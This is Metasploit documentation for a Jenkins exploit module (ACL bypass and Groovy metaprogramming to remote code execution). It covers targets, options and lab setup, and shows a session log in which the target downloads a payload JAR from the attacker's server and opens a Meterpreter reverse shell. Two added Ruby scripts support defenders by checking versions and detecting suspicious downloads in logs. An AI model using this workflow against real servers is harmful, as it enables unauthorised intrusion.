metasploit-framework/documentation/modules/exploit/multi/http/jenkins_metaprogramming.md


Introduction

This module exploits a vulnerability in Jenkins dynamic routing to bypass the Overall/Read ACL and leverage Groovy metaprogramming to download and execute a malicious JAR file.

When the Java Dropper target is selected, the original entry point based on classLoader.parseClass is used, which requires the use of Groovy metaprogramming to achieve RCE.

When the Unix In-Memory target is selected, a newer, higher-level, and more universal entry point based on GroovyShell.parse is used. This permits the use of in-memory arbitrary command execution.

The ACL bypass gadget is specific to Jenkins <= 2.137 and will not work on later versions of Jenkins.

Tested against Jenkins 2.137 and Pipeline: Groovy Plugin 2.61.
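The version boundary stated above is the first thing a defender wants to check across a fleet. The following is an added example and is not code from the Metasploit module: it reads the X-Jenkins response header (which Jenkins sends even on unauthenticated responses) and classifies each instance against the <= 2.137 boundary the module documentation gives. The hostnames and raw responses are constructed, and the exact fix versions of the LTS line are not on this page, so the check uses only the boundary the page states.

```ruby
# Added example, not part of the Metasploit module: triage Jenkins instances
# by the version they advertise in the X-Jenkins response header, against the
# boundary the module documentation states (ACL bypass gadget works on <= 2.137).
require 'rubygems'

LAST_AFFECTED = Gem::Version.new('2.137')

# Constructed raw responses, keyed by an assumed hostname. Jenkins answers
# even unauthenticated requests with an X-Jenkins header.
SAMPLE_RESPONSES = {
  'ci-a.internal' => "HTTP/1.1 403 Forbidden\r\nX-Jenkins: 2.137\r\nX-Jenkins-Session: 0f3a1c\r\n\r\n",
  'ci-b.internal' => "HTTP/1.1 200 OK\r\nX-Jenkins: 2.150.2\r\n\r\n",
  'ci-c.internal' => "HTTP/1.1 200 OK\r\nX-Jenkins: 2.121.3\r\n\r\n",
  'ci-d.internal' => "HTTP/1.1 200 OK\r\nServer: nginx\r\n\r\n"
}.freeze

# Extract the X-Jenkins header value from a raw HTTP response; nil if absent
# or not a well-formed version string.
def jenkins_version(raw_response)
  head = raw_response.split("\r\n\r\n", 2).first.to_s
  line = head.split("\r\n").find { |l| l =~ /\AX-Jenkins:/i }
  return nil unless line

  value = line.split(':', 2).last.strip
  Gem::Version.correct?(value) ? Gem::Version.new(value) : nil
end

# :affected_range -> version is within the range the module targets (<= 2.137)
# :later          -> newer than 2.137 (the ACL bypass gadget does not apply)
# :unknown        -> no usable version header
def classify(raw_response)
  v = jenkins_version(raw_response)
  return :unknown if v.nil?

  v <= LAST_AFFECTED ? :affected_range : :later
end

# Map every host in the inventory to its classification.
def triage_fleet(responses)
  responses.transform_values { |raw| classify(raw) }
end

if $PROGRAM_NAME == __FILE__
  triage_fleet(SAMPLE_RESPONSES).each { |host, status| puts "#{host}: #{status}" }
end
```

Gem::Version does the comparison so that 2.138.1 sorts after 2.137 and 2.121.3 before it, which a plain string comparison would get wrong. An instance reported as :unknown (no X-Jenkins header, often because a reverse proxy strips it) still needs a manual look.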

Setup

  1. git clone https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc
  2. cd cve-2019-1003000-jenkins-rce-poc/sample-vuln
  3. Edit run.sh and change 2.152-alpine to 2.137
  4. ./run.sh

Targets

Id  Name
--  ----
0   Unix In-Memory
1   Java Dropper

Options

RPORT

Set this to the Jenkins port. The default is 8080.

TARGETURI

Set this to the Jenkins base path. The default is /.

SRVPORT

Set this to the port on which to serve the payload. Change it from 8080 to something like 8081 if you are testing Jenkins locally on port 8080.

This option is valid only for the Java Dropper target.

ForceExploit

Set this to true to override the check result during exploitation.

Usage

msf5 exploit(multi/http/jenkins_metaprogramming) > run

[*] Started HTTPS reverse handler on https://192.168.1.2:8443
[*] Jenkins 2.137 detected
[+] Jenkins 2.137 is a supported target
[+] ACL bypass successful
[*] Using URL: http://0.0.0.0:8081/
[*] Local IP: http://192.168.1.2:8081/
[*] Configuring Java Dropper target
[*] Sending Jenkins and Groovy go-go-gadgets
[*] HEAD /CarisaChristiansen/Rank/3.3.5/Rank-3.3.5.pom requested
[-] Sending 404
[*] HEAD /CarisaChristiansen/Rank/3.3.5/Rank-3.3.5.jar requested
[+] Sending 200
[*] GET /CarisaChristiansen/Rank/3.3.5/Rank-3.3.5.jar requested
[+] Sending payload JAR
[*] https://192.168.1.2:8443 handling request from 192.168.1.2; (UUID: qlrpxu6t) Staging java payload (54399 bytes) ...
[*] Meterpreter session 1 opened (192.168.1.2:8443 -> 192.168.1.2:58688) at 2019-03-15 18:57:24 -0500
[*] Server stopped.
[!] This exploit may require manual cleanup of '$HOME/.groovy/grapes/CarisaChristiansen' on the target

meterpreter > getuid
Server username: jenkins
meterpreter > sysinfo
Computer    : 6f21b8da2915
OS          : Linux 4.9.93-linuxkit-aufs (amd64)
Meterpreter : java/linux
meterpreter >
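The session output above shows what the Java Dropper target looks like from the network: the Jenkins host resolves a Grape dependency by requesting <group>/<artifact>/<version>/<artifact>-<version>.pom (404) and then the .jar (200) from the module's HTTP server, and the downloaded group lands under $HOME/.groovy/grapes/<group>. The following is an added example, not code from the module, that looks for that Maven-repository path layout in an egress or proxy log for requests leaving a Jenkins host towards a host that is not an approved artifact repository. The log format, the Jenkins host addresses and the repository allowlist are all constructed assumptions.

```ruby
# Added example, not part of the Metasploit module: spot Grape-style artifact
# downloads leaving a Jenkins host in an egress/proxy log. The Maven-repository
# layout <group>/<artifact>/<version>/<artifact>-<version>.(pom|jar) on a request
# to a host that is not an approved repository is the signal.
require 'uri'

# Constructed sample log lines in an assumed "client method url status" format.
SAMPLE_PROXY_LOG = <<~LOG
  10.0.0.5 GET http://repo.maven.apache.org/maven2/org/slf4j/slf4j-api/1.7.25/slf4j-api-1.7.25.jar 200
  10.0.0.5 HEAD http://192.168.1.2:8081/CarisaChristiansen/Rank/3.3.5/Rank-3.3.5.pom 404
  10.0.0.5 HEAD http://192.168.1.2:8081/CarisaChristiansen/Rank/3.3.5/Rank-3.3.5.jar 200
  10.0.0.5 GET http://192.168.1.2:8081/CarisaChristiansen/Rank/3.3.5/Rank-3.3.5.jar 200
  10.0.0.9 GET http://intranet.example/index.html 200
LOG

JENKINS_HOSTS  = %w[10.0.0.5].freeze               # assumed: Jenkins controller addresses
APPROVED_REPOS = %w[repo.maven.apache.org].freeze  # assumed: allowlisted artifact repositories

# Maven/Grape repository layout: /<group path>/<artifact>/<version>/<artifact>-<version>.<ext>
GRAPE_PATH = %r{\A/(?<group>[^/]+(?:/[^/]+)*)/(?<artifact>[^/]+)/(?<version>[^/]+)/\k<artifact>-\k<version>\.(?<ext>jar|pom)\z}

# Return the artifact coordinates if the URL path follows the repository layout, else nil.
def parse_grape_url(url)
  uri = URI.parse(url)
  m = GRAPE_PATH.match(uri.path.to_s)
  return nil unless m

  { host: uri.host, group: m[:group], artifact: m[:artifact], version: m[:version], ext: m[:ext] }
rescue URI::InvalidURIError
  nil
end

# Every repository-layout request from a Jenkins host to a non-approved host.
# cache_dir is where Grape stores the group on the Jenkins host; the top-level
# "$HOME/.groovy/grapes/<group>" path matches the cleanup hint in the session
# above (mapping a slashed group path back to a dotted group id is an assumption).
def suspicious_grape_fetches(log_text)
  log_text.each_line.map do |line|
    client, method, url, status = line.split
    next unless JENKINS_HOSTS.include?(client)

    info = parse_grape_url(url)
    next if info.nil? || APPROVED_REPOS.include?(info[:host])

    info.merge(method: method, status: status.to_i,
               cache_dir: "$HOME/.groovy/grapes/#{info[:group].tr('/', '.')}")
  end.compact
end

# Of those, the JARs actually transferred (a completed GET): code that has
# reached the Jenkins host and whose cache directory needs inspection.
def jars_delivered(log_text)
  suspicious_grape_fetches(log_text).select do |f|
    f[:ext] == 'jar' && f[:method] == 'GET' && f[:status] == 200
  end
end

if $PROGRAM_NAME == __FILE__
  jars_delivered(SAMPLE_PROXY_LOG).each do |f|
    puts "#{f[:host]} delivered #{f[:artifact]}-#{f[:version]}.jar to Jenkins; inspect #{f[:cache_dir]}"
  end
end
```

The HEAD .pom 404 followed by HEAD/GET .jar 200 is Grape's normal resolution sequence, so the layout alone is not malicious; what makes the three flagged lines worth a look is the destination, a host outside the allowlist. Keeping the allowlist tight (or forcing all Groovy dependency resolution through an internal proxy) turns this detection into a block.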